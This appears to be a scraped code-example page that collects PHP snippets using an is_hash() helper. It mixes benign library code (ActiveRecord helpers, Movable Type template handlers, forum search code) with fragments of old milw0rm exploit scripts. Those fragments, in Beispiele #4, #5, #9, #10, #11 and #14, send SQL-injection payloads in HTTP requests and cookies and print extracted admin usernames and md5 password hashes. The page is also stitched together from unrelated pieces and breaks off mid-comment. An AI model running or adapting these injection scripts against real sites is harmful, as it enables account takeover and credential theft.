Beispiel #1
function output($txt)
{
    // Render a value as a debug-style string: a hash (per is_hash(), defined
    // elsewhere in the project) as "[k => v, ]", a list as "[v, ]", booleans
    // as true/false and anything else single-quoted.  Nested arrays recurse.
    // The separator is appended after every element, including the last one,
    // exactly as the original did.
    if (is_hash($txt)) {
        $pairs = '';
        foreach ($txt as $key => $val) {
            $pairs .= output($key) . " => " . output($val) . ', ';
        }
        return '[' . $pairs . ']';
    }
    if (is_array($txt)) {
        $items = '';
        foreach ($txt as $val) {
            $items .= output($val) . ', ';
        }
        return '[' . $items . ']';
    }
    if ($txt === TRUE || $txt === FALSE) {
        return $txt ? "true" : "false";
    }
    return "'{$txt}'";
}
 public function alias($fields)
 {
     // Collapse a field list into a comma-separated SQL select list.
     // A string is passed through untouched.  For an associative array
     // (per is_hash()) every string key becomes "<field> AS <key>"; numeric
     // keys are left as they are.  Nothing is quoted or escaped here, so the
     // field names must already be trusted SQL identifiers.
     if (!is_array($fields)) {
         return $fields;
     }
     if (is_hash($fields)) {
         foreach ($fields as $alias => $field) {
             if (is_numeric($alias)) {
                 continue;
             }
             $fields[$alias] = $field . ' AS ' . $alias;
         }
     }
     return implode(',', $fields);
 }
Beispiel #3
 /**
  * Pulls out the options hash from $array if any.
  *
  * If the last element of $array is an options hash (per is_options_hash())
  * it is popped off $array and returned.  If is_options_hash() throws an
  * ActiveRecordException but the last element is still a hash (per is_hash()),
  * that hash is treated as a conditions array and returned wrapped as
  * array('conditions' => $last); any other case re-throws the exception.
  *
  * @internal DO NOT remove the reference on $array.
  * @param array &$array An array
  * @return array A valid options array
  * @throws ActiveRecordException re-thrown from is_options_hash() when the
  *         last element is neither an options hash nor a plain hash
  */
 public static function extract_and_validate_options(array &$array)
 {
     $options = array();
     if ($array) {
         // Reference to the last element: the value stays readable through
         // $last after array_pop() removes it from $array below.  Assumes
         // $array is a list (keys 0..n-1); count()-1 is not the last key of a
         // sparse or associative array.
         $last =& $array[count($array) - 1];
         try {
             if (self::is_options_hash($last)) {
                 array_pop($array);
                 $options = $last;
             }
         } catch (ActiveRecordException $e) {
             if (!is_hash($last)) {
                 throw $e;
             }
             // A hash, but not an options hash: treat it as conditions.
             // Note that on this path the element is NOT popped from $array.
             $options = array('conditions' => $last);
         }
     }
     return $options;
 }
Beispiel #4
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
sleep(1);
$packet = "GET " . $p . "index.php?mode=viewid&post_id={$post_id} HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
$temp = explode('"message"><!--', $html);
for ($i = 1; $i < count($temp); $i++) {
    $temp2 = explode("-->", $temp[$i]);
    if (is_hash($temp2[0])) {
        $hash = $temp2[0];
        $temp2 = explode("-->", $temp[$i + 1]);
        $admin = $temp2[0];
        echo "----------------------------------------------------------------\n";
        echo "admin          -> " . $admin . "\n";
        echo "password (md5) -> " . $hash . "\n";
        echo "----------------------------------------------------------------\n";
        die;
    }
}
//if you are here...
echo "exploit failed...";
?>

# milw0rm.com [2006-08-07]
Beispiel #5
$packet = "POST " . $p . "index.php HTTP/1.0\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept-Encoding: text/plain\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
if (eregi("Gadget is not enabled", $html)) {
    die("search gadget is not enabled... exploit failed");
}
$temp = explode('">*SUNTZOI*', $html);
$temp2 = explode('*SUNTZOI*', $temp[1]);
$admin = $temp2[0];
$temp = explode('href="*SUNTZU*', $html);
$temp2 = explode('*SUNTZU*', $temp[1]);
$hash = $temp2[0];
if ($admin != '' and $hash != '' and is_hash($hash)) {
    echo "Exploit succeeded...\r\n";
    echo "--------------------------------------------------------------------\r\n";
    echo "admin          -> " . $admin . "\r\n";
    echo "password (md5) -> " . $hash . "\r\n";
    echo "--------------------------------------------------------------------\r\n";
} else {
    echo "Exploit failed, maybe wrong table prefix...";
}
?>

# milw0rm.com [2006-06-23]
Beispiel #6
/**
 * Smarty function handler for <MTSetVar>.
 *
 * Assigns $args['value'] to the template variable named by $args['name']
 * (or $args['var']).  The name may carry a function prefix "func(name)"
 * (or $args['function']), a "{key}" / "[index]" suffix (or $args['key'] /
 * $args['index']), and a leading "$" meaning the name is itself looked up in
 * the vars.  Modifiers: append, prepend, op (via _math_operation()),
 * function = delete | undef | push | unshift.  The result is stored either in
 * the '__inside_set_hashvar' stash (when that stash is set, presumably while
 * inside a hash-building tag) or in $ctx->__stash['vars'].
 *
 * @param array $args   tag attributes
 * @param object &$ctx  template context; MTUtil.php is required on demand
 * @return string       '' on success, otherwise the result of $ctx->error()
 */
function smarty_function_mtsetvar($args, &$ctx)
{
    // status: complete
    // parameters: name, value
    $name = $args['name'];
    // Fall back to the 'var' attribute when 'name' is missing or falsy.
    $name or $name = $args['var'];
    if (!$name) {
        return '';
    }
    $value = $args['value'];
    // Bind to the context's variable table so the writes below persist.
    $vars =& $ctx->__stash['vars'];
    if (strtolower($name) == 'page_layout') {
        # replaces page layout for current page
        require_once "MTUtil.php";
        $columns = get_page_column($value);
        $vars['page_columns'] = $columns;
        $vars['page_layout'] = $value;
    }
    # "func(name)" form: the function comes from the name itself, otherwise
    # from the 'function' attribute (if present).
    if (preg_match('/^(\\w+)\\((.+)\\)$/', $name, $matches)) {
        $func = $matches[1];
        $name = $matches[2];
    } else {
        if (array_key_exists('function', $args)) {
            $func = $args['function'];
        }
    }
    # pick off any {...} or [...] from the name.
    if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) {
        $name = $matches[1];
        $br = $matches[2];
        $ref = $matches[3];
        # A "$var" subscript is resolved through the vars; chr(0) marks an
        # unresolved one.
        if (preg_match('/^\\$(.+)/', $ref, $ref_matches)) {
            $ref = $vars[$ref_matches[1]];
            if (!isset($ref)) {
                $ref = chr(0);
            }
        }
        # Ternary used for its side effect: '[' selects an index, '{' a key.
        $br == '[' ? $index = $ref : ($key = $ref);
    } else {
        if (array_key_exists('index', $args)) {
            $index = $args['index'];
        } else {
            if (array_key_exists('key', $args)) {
                $key = $args['key'];
            }
        }
    }
    # A leading "$" means the name is itself a variable holding the real name.
    if (preg_match('/^\\$/', $name)) {
        $name = $vars[$name];
        if (!isset($name)) {
            # NOTE(review): $tag is never assigned in this function, so the
            # message interpolates an empty tag name.
            return $ctx->error($ctx->mt->translate("You used a [_1] tag without a valid name attribute.", "<MT{$tag}>"));
        }
    }
    # Current value of the variable (null, with a notice, when it does not exist yet).
    $existing = $vars[$name];
    require_once "MTUtil.php";
    if (isset($key)) {
        if (!isset($existing)) {
            $existing = array($key => $value);
        } elseif (is_hash($existing)) {
            $existing = $existing[$key];
        } else {
            return $ctx->error($ctx->mt->translate("'[_1]' is not a hash.", $name));
        }
    } elseif (isset($index)) {
        if (!isset($existing)) {
            # NOTE(review): unlike the key branch this leaves $existing as an
            # array holding $value rather than the member itself.
            $existing[$index] = $value;
        } elseif (is_array($existing)) {
            if (is_numeric($index)) {
                $existing = $existing[$index];
            } else {
                return $ctx->error($ctx->mt->translate("Invalid index."));
            }
        } else {
            return $ctx->error($ctx->mt->translate("'[_1]' is not an array.", $name));
        }
    }
    # append / prepend are string concatenations; 'op' delegates to
    # _math_operation(), whose null result is treated as an invalid operation.
    if (array_key_exists('append', $args) && $args['append']) {
        $value = isset($existing) ? $existing . $value : $value;
    } elseif (array_key_exists('prepend', $args) && $args['prepend']) {
        $value = isset($existing) ? $value . $existing : $value;
    } elseif (isset($existing) && array_key_exists('op', $args)) {
        $op = $args['op'];
        $value = _math_operation($op, $existing, $value);
        if (!isset($value)) {
            # NOTE(review): $value was just overwritten with null, so the
            # message can never show the offending right-hand operand.
            return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", $existing, $op, $value));
        }
    }
    # Rebuild the stored value from the original var and the computed $value.
    $data = $vars[$name];
    if (isset($key)) {
        if (isset($func) && 'delete' == strtolower($func)) {
            unset($data[$key]);
        } else {
            $data[$key] = $value;
        }
    } elseif (isset($index)) {
        $data[$index] = $value;
    } elseif (isset($func)) {
        if ('undef' == strtolower($func)) {
            # Leaves $data undefined; the store below then writes null.
            unset($data);
        } else {
            if (isset($data) && !is_array($data)) {
                return $ctx->error($ctx->mt->translate("'[_1]' is not an array.", $name));
            }
            if (!isset($data)) {
                $data = array();
            }
            if ('push' == strtolower($func)) {
                array_push($data, $value);
            } elseif ('unshift' == strtolower($func)) {
                array_unshift($data, $value);
            } else {
                return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function.", $func));
            }
        }
    } else {
        $data = $value;
    }
    # When the '__inside_set_hashvar' stash is set, the result goes into that
    # hash instead of the vars table.
    $hash = $ctx->stash('__inside_set_hashvar');
    if (isset($hash)) {
        $hash[$name] = $data;
        $ctx->stash('__inside_set_hashvar', $hash);
    } else {
        if (is_array($vars)) {
            $vars[$name] = $data;
        } else {
            # No vars table yet: create one and bind it back into the stash.
            $vars = array($name => $data);
            $ctx->__stash['vars'] =& $vars;
        }
    }
    return '';
}
Beispiel #7
/**
 * Smarty block handler for <MTIf>.
 *
 * On the opening call ($content not yet set) the tested value is resolved
 * either from a template variable (name / var, with an optional "{key}" or
 * "[index]" suffix or key / index attributes) or, given a 'tag' attribute,
 * by running that tag.  The value is then compared according to the first of
 * eq, ne, gt, lt, ge, le, like (regex) or test (PHP expression, see the note
 * at that branch) present in $args, or simply tested for truthiness.  The
 * 0/1 verdict is handed to $ctx->_hdlr_if(), which is left to decide the
 * rendering.  The closing call passes straight through to _hdlr_if().
 *
 * @param array $args          tag attributes
 * @param string|null $content block body (null on the opening call)
 * @param object &$ctx         template context
 * @param bool &$repeat        Smarty block repeat flag, managed by _hdlr_if()
 * @return string
 */
function smarty_block_mtif($args, $content, &$ctx, &$repeat)
{
    if (!isset($content)) {
        $result = 0;
        $name = isset($args['name']) ? $args['name'] : $args['var'];
        if (isset($name)) {
            unset($ctx->__stash['__cond_tag__']);
            # pick off any {...} or [...] from the name.
            if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) {
                $name = $matches[1];
                $br = $matches[2];
                $ref = $matches[3];
                # NOTE(review): in PCRE this pattern is "\\$", a literal
                # backslash followed by "$"; the SetVar handler uses a plain
                # "\$".  Presumably an escaping artifact -- confirm.
                if (preg_match('/^\\\\\\$(.+)/', $ref, $ref_matches)) {
                    # NOTE(review): $vars is only assigned in the closing-call
                    # branch at the bottom of this function, so here it is
                    # undefined and this lookup always yields null.
                    $ref = $vars[$ref_matches[1]];
                    if (!isset($ref)) {
                        $ref = chr(0);
                    }
                }
                # Ternary used for its side effect: '[' selects an index, '{' a key.
                $br == '[' ? $index = $ref : ($key = $ref);
            } else {
                if (array_key_exists('index', $args)) {
                    $index = $args['index'];
                } else {
                    if (array_key_exists('key', $args)) {
                        $key = $args['key'];
                    }
                }
            }
            # NOTE(review): '/^$/' matches only the empty string (presumably
            # '/^\$/' was meant, as in the SetVar handler), so this indirect
            # lookup never runs for a real name; $vars is undefined here too.
            if (preg_match('/^$/', $name)) {
                $name = $vars[$name];
                if (!isset($name)) {
                    # NOTE(review): $tag is only assigned in the 'tag' branch below.
                    return $ctx->error($ctx->mt->translate("You used an [_1] tag without a valid name attribute.", "<MT{$tag}>"));
                }
            }
            if (isset($name)) {
                $value = $ctx->__stash['vars'][$name];
                require_once "MTUtil.php";
                if (is_hash($value)) {
                    if (isset($key)) {
                        # chr(0) is the sentinel for an unresolved "$ref" above:
                        # no member is selected and $value is dropped.
                        if ($key != chr(0)) {
                            $val = $value[$key];
                        } else {
                            unset($value);
                        }
                    } else {
                        $val = $value;
                    }
                } elseif (is_array($value)) {
                    if (isset($index)) {
                        if (is_numeric($index)) {
                            $val = $value[$index];
                        } else {
                            unset($value);
                            # fall through to any 'default'
                        }
                    } else {
                        $val = $value;
                    }
                } else {
                    $val = $value;
                }
            }
        } elseif (isset($args['tag'])) {
            # 'tag' form: run the named tag (mt: prefix stripped) with the
            # remaining attributes and test its output; a throwing tag counts as ''.
            $tag = $args['tag'];
            $tag = preg_replace('/^mt:?/i', '', $tag);
            $largs = $args;
            // local arguments without 'tag' element
            unset($largs['tag']);
            try {
                $val = $ctx->tag($tag, $largs);
            } catch (exception $e) {
                $val = '';
            }
        }
        # A compiled template fragment is stored as the name of a generated
        # function; run it and capture its output.
        # NOTE(review): the regex is tested against $value, which is never set
        # in the 'tag' branch, while function_exists() checks $val -- the two
        # were probably meant to be the same variable.
        if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) {
            if (function_exists($val)) {
                ob_start();
                $val($ctx, array());
                $val = ob_get_contents();
                ob_end_clean();
            } else {
                $val = '';
            }
        }
        # Remember what was tested in the stash (read elsewhere, presumably by
        # the else handlers).
        if (isset($args['tag'])) {
            $ctx->__stash['__cond_tag__'] = $args['tag'];
        } else {
            if (isset($args['name'])) {
                $var_key = $args['name'];
            } else {
                if (isset($args['var'])) {
                    $var_key = $args['var'];
                }
            }
            $ctx->__stash['__cond_name__'] = $var_key;
        }
        $ctx->__stash['__cond_value__'] = $val;
        # Optional arithmetic on the tested value before the comparison.
        if (array_key_exists('op', $args)) {
            $op = $args['op'];
            $rvalue = $args['value'];
            if ($op && isset($value) && !is_array($value)) {
                $val = _math_operation($op, $val, $rvalue);
                if (!isset($val)) {
                    # NOTE(review): the placeholders are passed as one array here
                    # but as separate arguments in the SetVar handler -- confirm
                    # which form translate() expects.
                    return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", array($value, $op, $rvalue)));
                }
            }
        }
        # First comparison attribute present wins; all comparisons are loose (==, <, ...).
        if (array_key_exists('eq', $args)) {
            $val2 = $args['eq'];
            $result = $val == $val2 ? 1 : 0;
        } elseif (array_key_exists('ne', $args)) {
            $val2 = $args['ne'];
            $result = $val != $val2 ? 1 : 0;
        } elseif (array_key_exists('gt', $args)) {
            $val2 = $args['gt'];
            $result = $val > $val2 ? 1 : 0;
        } elseif (array_key_exists('lt', $args)) {
            $val2 = $args['lt'];
            $result = $val < $val2 ? 1 : 0;
        } elseif (array_key_exists('ge', $args)) {
            $val2 = $args['ge'];
            $result = $val >= $val2 ? 1 : 0;
        } elseif (array_key_exists('le', $args)) {
            $val2 = $args['le'];
            $result = $val <= $val2 ? 1 : 0;
        } elseif (array_key_exists('like', $args)) {
            # 'like': either a "/.../[si]" literal (modifiers kept) or a bare
            # pattern in which only "/" is escaped.  Either way the attribute
            # text is compiled as a regex as-is, so template authors control
            # the pattern.
            $patt = $args['like'];
            $opt = "";
            if (preg_match("/^\\/.+\\/([si]+)?\$/", $patt, $matches)) {
                $patt = preg_replace("/^\\/|\\/([si]+)?\$/", "", $patt);
                if ($matches[1]) {
                    $opt = $matches[1];
                }
            } else {
                $patt = preg_replace("!/!", "\\/", $patt);
            }
            $result = preg_match("/{$patt}/{$opt}", $val) ? 1 : 0;
        } elseif (array_key_exists('test', $args)) {
            # NOTE(review): the 'test' attribute is run as PHP via eval() with
            # every template var extract()ed into local scope, so whoever can
            # author that attribute executes arbitrary PHP in this process;
            # and die() on a failed eval aborts the whole request instead of
            # returning $ctx->error() like the other failure paths.
            $expr = 'return (' . $args['test'] . ') ? 1 : 0;';
            // export vars into local variable namespace, then eval expr
            extract($ctx->__stash['vars']);
            $result = eval($expr);
            if ($result === FALSE) {
                die("error in expression [" . $args['test'] . "]");
            }
        } else {
            # No comparison attribute: plain truthiness of the value.
            $result = isset($val) && $val ? 1 : 0;
        }
        return $ctx->_hdlr_if($args, $content, $ctx, $repeat, $result);
    } else {
        # Closing call: $vars is bound here but not used.
        $vars =& $ctx->__stash['vars'];
        return $ctx->_hdlr_if($args, $content, $ctx, $repeat);
    }
}
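 private function apply_where_conditions($args)
 {
     // Translates the arguments of a where-style call into $this->where
     // (SQL fragment) and $this->where_values (bind values).
     //
     // Two forms are accepted:
     //   - a single hash: each key/value becomes a condition compiled by
     //     Expressions (table names are prepended when joins are present);
     //   - a string followed by bind values: used verbatim unless one of the
     //     values is an array, in which case Expressions expands the bind
     //     marker for it.
     // With no arguments nothing is changed.
     require_once 'Expressions.php';
     $num_args = count($args);
     if ($num_args == 1 && is_hash($args[0])) {
         $hash = is_null($this->joins) ? $args[0] : $this->prepend_table_name_to_fields($args[0]);
         $e = new Expressions($this->connection, $hash);
         $this->where = $e->to_s();
         $this->where_values = array_flatten($e->values());
     } elseif ($num_args > 0) {
         $values = array_slice($args, 1);
         // A nested array among the bind values needs Expressions to expand
         // the bind marker.  The loop iterates by value: the previous
         // by-reference loop (foreach ... as &$value, never unset) left a
         // dangling reference to the last element of $values, which was then
         // handed to $this->where_values below.
         foreach ($values as $value) {
             if (is_array($value)) {
                 $e = new Expressions($this->connection, $args[0]);
                 $e->bind_values($values);
                 $this->where = $e->to_s();
                 $this->where_values = array_flatten($e->values());
                 return;
             }
         }
         // No nested array so nothing special to do.  $values is a local,
         // so a plain copy is equivalent to the former reference assignment.
         $this->where = $args[0];
         $this->where_values = $values;
     }
 }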
Beispiel #9
    $packet .= "Content-Length: " . strlen($data) . "\r\n";
    $packet .= "Cookie: threadvisit={$sql};\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data;
    sendpacketii($packet);
    $temp = explode("#post", $html);
    $temp2 = explode("\n", $temp[1]);
    echo chr((int) $temp2[0]);
    $user .= chr((int) $temp2[0]);
}
echo "\n";
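function is_hash($hash)
{
    // True when $hash, after trim(), begins with 32 lowercase hex characters,
    // i.e. looks like an md5 digest.  ereg() was removed in PHP 7, so the same
    // check is done with preg_match().  The pattern is deliberately left
    // unanchored at the end, as the original was: text following the 32
    // characters is still accepted, so this is a "starts with" test, not a
    // strict validator.
    return preg_match('/^[a-f0-9]{32}/', trim($hash)) === 1;
}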
if (is_hash($hash)) {
    print_r('
exploit succeeded, try this cookie:
wbb_userid=' . $uid . '; wbb_userpassword='******';
');
} else {
    echo "exploit failed...\n";
}
?>

# milw0rm.com [2006-11-24]
Beispiel #10
    $temp2 = explode('"', $temp[1]);
    $HASH = $temp2[0];
    if (is_hash($HASH)) {
        echo "HASH ->" . htmlentities($HASH) . "<BR>";
        die("Exploit Succeeded...");
    } else {
        echo "Step 1 failed... trying step 2...<br>";
    }
    #STEP 2 -> if STEP 1 failed, vulnerability in getfile.php... this works with magic_quotes off
    $SQL = "'UNION SELECT value,value FROM " . $prefix . "variables1 WHERE name='admin_password'/*";
    $SQL = urlencode($SQL);
    $packet = "GET " . $p . "getfile.php?cat=" . $SQL . " HTTP/1.1\r\n";
    $packet .= "User-Agent: Python-urllib/2.0a1, maybe ;)\r\n";
    $packet .= "Accept: text/plain\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    show($packet);
    sendpacketii($packet);
    $temp = explode('Content-Type: ', $html);
    $temp2 = explode(chr(0xd), $temp[1]);
    $HASH = $temp2[0];
    if (is_hash($HASH)) {
        echo "HASH ->" . htmlentities($HASH) . "<BR>Exploit Succeeded...";
    } else {
        echo "Exploit failed...";
    }
}
?>

# milw0rm.com [2005-12-24]
Beispiel #11
            echo "admin -> " . $my_admin . "[???]\n";
            sleep(1);
            break;
        }
        if ($i == 255) {
            die("Exploit failed...");
        }
    }
    $j++;
}
echo "--------------------------------------------------------------------\n";
echo "admin          -> " . $my_admin . "\n";
echo "password (md5) -> " . $my_password . "\n";
echo "--------------------------------------------------------------------\n";
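function is_hash($hash)
{
    // True when $hash, after trim(), begins with 32 lowercase hex characters,
    // i.e. looks like an md5 digest.  ereg() was removed in PHP 7, so the same
    // check is done with preg_match().  The pattern is deliberately left
    // unanchored at the end, as the original was: text following the 32
    // characters is still accepted, so this is a "starts with" test, not a
    // strict validator.
    return preg_match('/^[a-f0-9]{32}/', trim($hash)) === 1;
}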
if (is_hash($my_password)) {
    echo "Exploit succeeded...";
} else {
    echo "Exploit failed...";
}
?>

# milw0rm.com [2006-09-21]
        $searchresult[] = $row['topic_id'];
    }
    if (count($searchresult) > 0) {
        $data = array('ids' => $searchresult, 'ignored' => $ignored, 'used' => $used, 'search' => $gpc->get('search', str), 'name' => $gpc->get('name', str), 'boards' => $gpc->get('boards', arr_int), 'opt_0' => $gpc->get('opt_0', int), 'opt_1' => $gpc->get('opt_1', int), 'opt_2' => $gpc->get('opt_2', int), 'temp' => $gpc->get('temp', int), 'temp2' => $gpc->get('temp2', int), 'sort' => $gpc->get('sort', str), 'order' => $gpc->get('order', str));
        $fid = md5(microtime());
        file_put_contents('cache/search/' . $fid . '.inc.php', serialize($data));
        $slog->updatelogged();
        $db->close();
        viscacha_header('Location: search.php?action=result&fid=' . $fid . SID2URL_JS_x);
        exit;
    } else {
        error($lang->phrase('search_nothingfound'), 'search.php' . SID2URL_1);
    }
} elseif ($_GET['action'] == "result") {
    $fid = $gpc->get('fid');
    if (!is_hash($fid)) {
        error($lang->phrase('query_string_error'), 'search.php' . SID2URL_1);
    }
    $file = "cache/search/{$fid}.inc.php";
    if (!file_exists($file)) {
        error($lang->phrase('search_doesntexist'), 'search.php' . SID2URL_1);
    }
    $data = file_get_contents($file);
    $data = unserialize($data);
    $ignored = array();
    foreach ($data['ignored'] as $row) {
        $row = trim($row);
        if (!empty($row)) {
            $ignored[] = $row;
        }
    }
Beispiel #13
 function writeValueWithSpec()
 {
     // Serialises the first argument ($val) according to a spec, given as the
     // optional second argument and defaulting to $this->spec:
     //   - hash spec (per is_hash()): keys are visited in sorted order and each
     //     member of the value (object property or array element) is written
     //     with the matching sub-spec;
     //   - list spec: the element count is written first (typed via
     //     type_check()), then every element with $spec[0];
     //   - scalar spec: the value is written with type_check() as its type when
     //     the spec equals (TRUEVAL & FALSEVAL), otherwise with $spec itself.
     $params = func_get_args();
     $val = $params[0];
     $spec = count($params) >= 2 ? $params[1] : $this->spec;
     if (!is_array($spec)) {
         $type = $spec === (TRUEVAL & FALSEVAL) ? type_check($val) : $spec;
         $this->writeValue($val, $type, TRUE);
         return;
     }
     if (!is_hash($spec)) {
         $count = count($val);
         $this->writeValue($count, type_check($count));
         foreach ($val as $item) {
             $this->writeValueWithSpec($item, $spec[0]);
         }
         return;
     }
     $keys = array_keys($spec);
     sort($keys);
     foreach ($keys as $k) {
         $member = is_object($val) ? $val->{$k} : $val[$k];
         $this->writeValueWithSpec($member, $spec[$k]);
     }
 }
Beispiel #14
        echo "table prefix -> " . $prefix . "\n";
    } else {
        die("Unable to disclose table prefix...\n");
    }
}
$diff = array(",0,0,0,0,0", ",0,0,0,0", ",0,0,0", ",0,0", ",0", "");
for ($j = 0; $j <= count($diff) - 1; $j++) {
    $sql = "9999')/**/UNION/**/SELECT/**/1,0,0,0,CONCAT('*WhOp*',username,':',password,'*WhOp*'),0,0,0,0,0" . $diff[$j] . "/**/FROM " . $prefix . "_papoo_user/**/WHERE/**/gruppenid='g1,'/*";
    $sql = urlencode($sql);
    $packet = "GET " . $p . "forumthread.php?msgid=" . $sql . " HTTP/1.0\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    sendpacketii($packet);
    $temp = explode("*WhOp*", $html);
    for ($i = 1; $i <= count($temp) - 1; $i++) {
        $temp2 = explode(":", $temp[$i]);
        if (is_hash($temp2[1])) {
            echo "--------------------------------------------------------\n";
            echo "admin          -> " . $temp2[0] . "                         \n";
            echo "password (md5) -> " . $temp2[1] . "                         \n";
            echo "--------------------------------------------------------\n";
            die;
        }
    }
}
//if you are here...
echo "exploit failed...";
?>

# milw0rm.com [2006-07-07]
Beispiel #15
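function select_options($options = array(), $key = "", $value = "", $default_value = "")
{
    // Builds the <option> elements of a <select> from $options, one per line.
    //
    // A hash (per is_hash()) is treated as value => label; a plain list uses
    // each entry as both value and label.  The entry whose value equals
    // $default_value (loose ==, as before, so numeric strings and ints still
    // match) gets the SELECTED attribute.  $key and $value are not used and
    // remain only for signature compatibility.
    //
    // Changes: each() (removed in PHP 8) replaced by foreach; the value
    // attribute is now HTML-escaped like the label already was, so a value
    // containing a quote can no longer break out of the attribute.
    $elem = array();
    $is_hash = is_hash($options);
    foreach ($options as $opt_key => $val) {
        $opt_value = $is_hash ? $opt_key : $val;
        $selected = $default_value == $opt_value ? ' SELECTED' : '';
        $elem[] = '<option value="' . htmlspecialchars((string) $opt_value, ENT_QUOTES, 'UTF-8') . '"' . $selected . '>'
            . htmlspecialchars($val, ENT_QUOTES, 'UTF-8') . '</option>';
    }
    return implode("\n", $elem);
}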
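function save_error_data($fc, $fid = '')
{
    // Stores $fc under temp/errordata/<fid> via CacheItem and returns the id.
    //
    // When $fid is not already a valid id (per is_hash()) a fresh one is
    // generated.  It keeps the 32-lowercase-hex shape md5() produced, which
    // the surrounding is_hash() checks are presumed to accept, but is now
    // drawn from random_bytes() (PHP 7+) instead of md5(microtime()): a
    // timestamp-derived id is predictable from the request time, so another
    // client could guess the id of someone else's stored data.  The unused
    // `global $gpc` declaration was dropped.
    if (!is_hash($fid)) {
        $fid = bin2hex(random_bytes(16));
    }
    $cache = new CacheItem($fid, 'temp/errordata/');
    $cache->set($fc);
    $cache->export();
    return $fid;
}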
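/**
 * Smarty block handler for <MTLoop>: iterates over the array held in the
 * template variable named by 'name' (or 'var').
 *
 * Opening call ($content not yet set): localizes the loop vars, resolves the
 * variable (a value naming a generated smarty_fun_<hex> function is called
 * and its output used instead), returns '' when the value is not a non-empty
 * array, orders the keys per 'sort_by' (key | value, optionally combined with
 * numeric and/or reverse) and stashes the values as '__loop_values'.
 *
 * Every call then shifts the next key, publishes __counter__, __odd__,
 * __even__, __first__, __last__, __key__ and __value__ (plus the lowercased
 * members of a hash element) into the vars, prefixes 'glue' to every rendered
 * body but the first, and sets $repeat so Smarty calls back until the keys run
 * out, at which point the localized vars are restored.
 *
 * Change: the sort comparators are closures instead of create_function()
 * (removed in PHP 8); see the comment in the 'value' sort branch.
 *
 * @param array $args          tag attributes: name/var, sort_by, glue
 * @param string|null $content block body (null on the opening call)
 * @param object &$ctx         template context
 * @param bool &$repeat        Smarty block repeat flag
 * @return string rendered body for this iteration
 */
function smarty_block_mtloop($args, $content, &$ctx, &$repeat)
{
    $localvars = array(array('__loop_keys', '__loop_values', '__out'), common_loop_vars());
    if (!isset($content)) {
        $ctx->localize($localvars);
        $vars =& $ctx->__stash['vars'];
        $value = '';
        $name = $args['name'];
        // Fall back to the 'var' attribute when 'name' is missing or falsy.
        $name or $name = $args['var'];
        if (!$name) {
            return '';
        }
        if (isset($vars[$name])) {
            $value = $vars[$name];
        }
        // A compiled template fragment is stored as the name of a generated
        // function; run it and capture its output as the value.
        if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) {
            if (function_exists($value)) {
                ob_start();
                $value($ctx, array());
                $value = ob_get_contents();
                ob_end_clean();
            } else {
                $value = '';
            }
        }
        if (!is_array($value) || 0 == count($value)) {
            $repeat = false;
            return '';
        }
        // isset() avoids an undefined-index notice; a missing attribute and ''
        // behave the same in the truthiness test below.
        $sort = isset($args['sort_by']) ? $args['sort_by'] : '';
        $keys = array_keys($value);
        if ($sort) {
            $sort = strtolower($sort);
            if (preg_match('/\\bkey\\b/', $sort)) {
                usort($keys, function ($a, $b) {
                    return strcmp($a, $b);
                });
            } elseif (preg_match('/\\bvalue\\b/', $sort)) {
                // Order keys by their values.  The comparator used to be
                // assembled as PHP source for create_function() with every key
                // and value interpolated into it, so a quote or PHP code inside
                // the data broke the sort or was executed; a closure over
                // $value needs no code generation.
                if (preg_match('/\\bnumeric\\b/', $sort)) {
                    $sorter = function ($a, $b) use ($value) {
                        return $value[$a] === $value[$b] ? 0 : ($value[$a] > $value[$b] ? 1 : -1);
                    };
                } else {
                    $sorter = function ($a, $b) use ($value) {
                        return strcmp($value[$a], $value[$b]);
                    };
                }
                usort($keys, $sorter);
            }
            if (preg_match('/\\breverse\\b/', $sort)) {
                $keys = array_reverse($keys);
            }
        }
        $counter = 1;
        $ctx->stash('__loop_values', $value);
        $ctx->stash('__out', false);
    } else {
        $counter = $ctx->__stash['vars']['__counter__'] + 1;
        $keys = $ctx->stash('__loop_keys');
        $value = $ctx->stash('__loop_values');
        $out = $ctx->stash('__out');
        // '__loop_keys' is set to 0 once the last key has been consumed (see
        // the end of this function): the loop is finished.
        if (!isset($keys) || $keys == 0) {
            $ctx->restore($localvars);
            $repeat = false;
            if (isset($args['glue']) && $out && !empty($content)) {
                $content = $args['glue'] . $content;
            }
            return $content;
        }
    }
    $key = array_shift($keys);
    $this_value = $value[$key];
    $ctx->stash('__loop_keys', $keys);
    $ctx->__stash['vars']['__counter__'] = $counter;
    $ctx->__stash['vars']['__odd__'] = $counter % 2 == 1;
    $ctx->__stash['vars']['__even__'] = $counter % 2 == 0;
    $ctx->__stash['vars']['__first__'] = $counter == 1;
    $ctx->__stash['vars']['__last__'] = count($keys) == 0;
    $ctx->__stash['vars']['__key__'] = $key;
    $ctx->__stash['vars']['__value__'] = $this_value;
    // Hash elements also expose their members as lowercased template vars.
    if (is_array($this_value) && 0 < count($this_value)) {
        require_once "MTUtil.php";
        if (is_hash($this_value)) {
            foreach (array_keys($this_value) as $inner_key) {
                $ctx->__stash['vars'][strtolower($inner_key)] = $this_value[$inner_key];
            }
        }
    }
    // 'glue' goes in front of every rendered body except the first.  On the
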